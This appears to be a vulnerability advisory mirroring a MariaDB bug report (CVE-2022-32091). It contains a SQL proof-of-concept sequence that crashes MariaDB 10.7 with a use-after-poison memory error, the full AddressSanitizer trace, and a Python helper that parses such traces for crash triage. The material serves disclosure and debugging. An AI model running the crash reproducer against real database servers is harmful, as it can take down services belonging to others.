CVE-2022-32091: [MDEV-26431] MariaDB Server use-after-poison - Jira

MariaDB v10.7 was discovered to contain a use-after-poison in __interceptor_memset at /libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc.

Tags: #sql #linux #c++ #jira

```sql
CREATE TABLE v0 ( v2 BIGINT , v1 BIGINT ) ENGINE = MEMORY ROW_FORMAT = COMPRESSED AS SELECT 59218101.000000 AS v3 UNION SELECT FALSE ;
START TRANSACTION ;
SELECT instr ( v1 , DES_ENCRYPT ( 'x' REGEXP 'x' , 'x' ) ) BETWEEN v3 AND -1 FROM v0 ;
SELECT DISTINCT v2 IN ( COLLATION ( AVG ( 'x' ) ) + -128 , 'x' , 'x' ) FROM v0 WHERE v2 IS NOT NULL ;
UPDATE v0 SET v2 = v3 + 69 ;
INSERT INTO v0 ( ) SELECT v1 , v1 FROM v0 ;
```

```text
=================================================================
==2933067==ERROR: AddressSanitizer: use-after-poison on address 0x6290000a6080 at pc 0x7fb1687ce7b7 bp 0x7fb1435a5730 sp 0x7fb1435a4ed8
WRITE of size 944 at 0x6290000a6080 thread T14
    #0 0x7fb1687ce7b6 in __interceptor_memset /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:799
    #1 0x55c6bfcc41e9 in JOIN::make_aggr_tables_info() /experiment/mariadb-server/sql/sql_select.cc:3694
    #2 0x55c6bfcf2e71 in JOIN::optimize_stage2() /experiment/mariadb-server/sql/sql_select.cc:3225
    #3 0x55c6bfcfcd06 in JOIN::optimize_inner() /experiment/mariadb-server/sql/sql_select.cc:2479
    #4 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql_select.cc:1809
    #5 0x55c6bfcfea0d in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /experiment/mariadb-server/sql/sql_select.cc:4977
    #6 0x55c6bfd00654 in handle_select(THD*, LEX*, select_result*, unsigned long) /experiment/mariadb-server/sql/sql_select.cc:545
    #7 0x55c6bfb43d7c in execute_sqlcom_select /experiment/mariadb-server/sql/sql_parse.cc:6256
    #8 0x55c6bfb6d420 in mysql_execute_command(THD*, bool) /experiment/mariadb-server/sql/sql_parse.cc:3946
    #9 0x55c6bfb725a0 in mysql_parse(THD*, char*, unsigned int, Parser_state*) /experiment/mariadb-server/sql/sql_parse.cc:8030
    #10 0x55c6bfb7860b in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /experiment/mariadb-server/sql/sql_parse.cc:1896
    #11 0x55c6bfb7d73c in do_command(THD*, bool) /experiment/mariadb-server/sql/sql_parse.cc:1404
    #12 0x55c6bff38e56 in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1418
    #13 0x55c6bff3933c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
    #14 0x55c6c09c9c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
    #15 0x7fb1681ba258 in start_thread (/usr/lib/libpthread.so.0+0x9258)
    #16 0x7fb167d655e2 in __GI___clone (/usr/lib/libc.so.6+0xfe5e2)

0x6290000a6080 is located 3712 bytes inside of 16400-byte region [0x6290000a5200,0x6290000a9210)
allocated by thread T14 here:
    #0 0x7fb16884c279 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x55c6c12fc9a8 in my_malloc /experiment/mariadb-server/mysys/my_malloc.c:90
    #2 0x55c6c12e9414 in alloc_root /experiment/mariadb-server/mysys/my_alloc.c:332
    #3 0x55c6bfc3d047 in Query_arena::alloc(unsigned long) /experiment/mariadb-server/sql/sql_class.h:1206
    #4 0x55c6bfc3d047 in update_ref_and_keys /experiment/mariadb-server/sql/sql_select.cc:7110
    #5 0x55c6bfce537e in make_join_statistics /experiment/mariadb-server/sql/sql_select.cc:5377
    #6 0x55c6bfcfc73b in JOIN::optimize_inner() /experiment/mariadb-server/sql/sql_select.cc:2453
    #7 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql_select.cc:1809
    #8 0x55c6bfcfea0d in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /experiment/mariadb-server/sql/sql_select.cc:4977
    #9 0x55c6bfd00654 in handle_select(THD*, LEX*, select_result*, unsigned long) /experiment/mariadb-server/sql/sql_select.cc:545
    #10 0x55c6bfb43d7c in execute_sqlcom_select /experiment/mariadb-server/sql/sql_parse.cc:6256
    #11 0x55c6bfb6d420 in mysql_execute_command(THD*, bool) /experiment/mariadb-server/sql/sql_parse.cc:3946
    #12 0x55c6bfb725a0 in mysql_parse(THD*, char*, unsigned int, Parser_state*) /experiment/mariadb-server/sql/sql_parse.cc:8030
    #13 0x55c6bfb7860b in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /experiment/mariadb-server/sql/sql_parse.cc:1896
    #14 0x55c6bfb7d73c in do_command(THD*, bool) /experiment/mariadb-server/sql/sql_parse.cc:1404
    #15 0x55c6bff38e56 in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1418
    #16 0x55c6bff3933c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
    #17 0x55c6c09c9c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
    #18 0x7fb1681ba258 in start_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:
    #0 0x7fb1687edfa7 in __interceptor_pthread_create /build/gcc/src/gcc/libsanitizer/asan/asan_interceptors.cpp:216
    #1 0x55c6c09c9ea9 in my_thread_create /experiment/mariadb-server/storage/perfschema/my_thread.h:48
    #2 0x55c6c09c9ea9 in pfs_spawn_thread_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252
    #3 0x55c6bf83ab3c in inline_mysql_thread_create /experiment/mariadb-server/include/mysql/psi/mysql_thread.h:1139
    #4 0x55c6bf83ab3c in create_thread_to_handle_connection(CONNECT*) /experiment/mariadb-server/sql/mysqld.cc:5934
    #5 0x55c6bf8467b6 in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /experiment/mariadb-server/sql/mysqld.cc:6055
    #6 0x55c6bf84736f in handle_connections_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179
    #7 0x55c6bf84aa52 in mysqld_main(int, char**) /experiment/mariadb-server/sql/mysqld.cc:5829
    #8 0x7fb167c8eb24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:799 in __interceptor_memset
Shadow bytes around the buggy address:
  0x0c528000cbc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528000cbd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528000cbe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528000cbf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528000cc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c528000cc10:[f7]00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528000cc20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528000cc30: 00 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c528000cc40: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c528000cc50: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c528000cc60: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2933067==ABORTING
```
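Triage helper added here as an example (not MariaDB's or the reporter's code): it parses an AddressSanitizer report in the format shown above into bug class, access type, crash and allocation stacks, picks the first frame outside the sanitizer runtime (the line to open first), and derives a signature for bucketing fuzzer crashes. The embedded sample is a constructed excerpt of the report on this page.

```python
import re
from dataclasses import dataclass

# Constructed excerpt of the report on this page: crash stack, region line, allocation stack.
SAMPLE = """\
==2933067==ERROR: AddressSanitizer: use-after-poison on address 0x6290000a6080 at pc 0x7fb1687ce7b7 bp 0x7fb1435a5730 sp 0x7fb1435a4ed8
WRITE of size 944 at 0x6290000a6080 thread T14
    #0 0x7fb1687ce7b6 in __interceptor_memset /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:799
    #1 0x55c6bfcc41e9 in JOIN::make_aggr_tables_info() /experiment/mariadb-server/sql/sql_select.cc:3694
    #2 0x55c6bfcf2e71 in JOIN::optimize_stage2() /experiment/mariadb-server/sql/sql_select.cc:3225
0x6290000a6080 is located 3712 bytes inside of 16400-byte region [0x6290000a5200,0x6290000a9210)
allocated by thread T14 here:
    #0 0x7fb16884c279 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x55c6c12fc9a8 in my_malloc /experiment/mariadb-server/mysys/my_malloc.c:90
    #4 0x55c6bfc3d047 in update_ref_and_keys /experiment/mariadb-server/sql/sql_select.cc:7110
"""

HEADER = re.compile(r"==\d+==ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at 0x[0-9a-f]+ thread T\d+", re.M)
FRAME = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (?P<func>.+) (?P<loc>\S+)$", re.M)  # location is the last token
REGION = re.compile(r"is located (?P<off>\d+) bytes inside of (?P<len>\d+)-byte region")

@dataclass
class AsanReport:
    kind: str           # bug class, e.g. use-after-poison
    op: str             # READ or WRITE
    size: int           # bytes accessed
    crash_stack: list   # (function, location) pairs, innermost first
    alloc_stack: list   # same for the allocation site; empty when ASan printed none
    region_offset: int  # offset of the bad address inside its allocation, -1 if unknown

def first_user_frame(frames):
    """Innermost frame outside the sanitizer runtime: the first line to open when triaging."""
    return next(((f, l) for f, l in frames if "/libsanitizer/" not in l), ("?", "?"))

def parse_asan_report(text):
    head, access = HEADER.search(text), ACCESS.search(text)
    if not head or not access:
        raise ValueError("not an AddressSanitizer access report")
    crash_part, _, alloc_part = text.partition("allocated by thread")  # frames after this belong to the allocation
    region = REGION.search(text)
    return AsanReport(
        kind=head["kind"], op=access["op"], size=int(access["size"]),
        crash_stack=[(m["func"], m["loc"]) for m in FRAME.finditer(crash_part)],
        alloc_stack=[(m["func"], m["loc"]) for m in FRAME.finditer(alloc_part)],
        region_offset=int(region["off"]) if region else -1)

def crash_signature(report):
    """Stable key for de-duplicating fuzzer crashes: bug class, access type and first non-runtime function."""
    return f"{report.kind}:{report.op}:{first_user_frame(report.crash_stack)[0].split('(')[0]}"
```

Run on the sample it yields the signature `use-after-poison:WRITE:JOIN::make_aggr_tables_info`, so re-discoveries of this bug under different query shapes collapse into one bucket.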
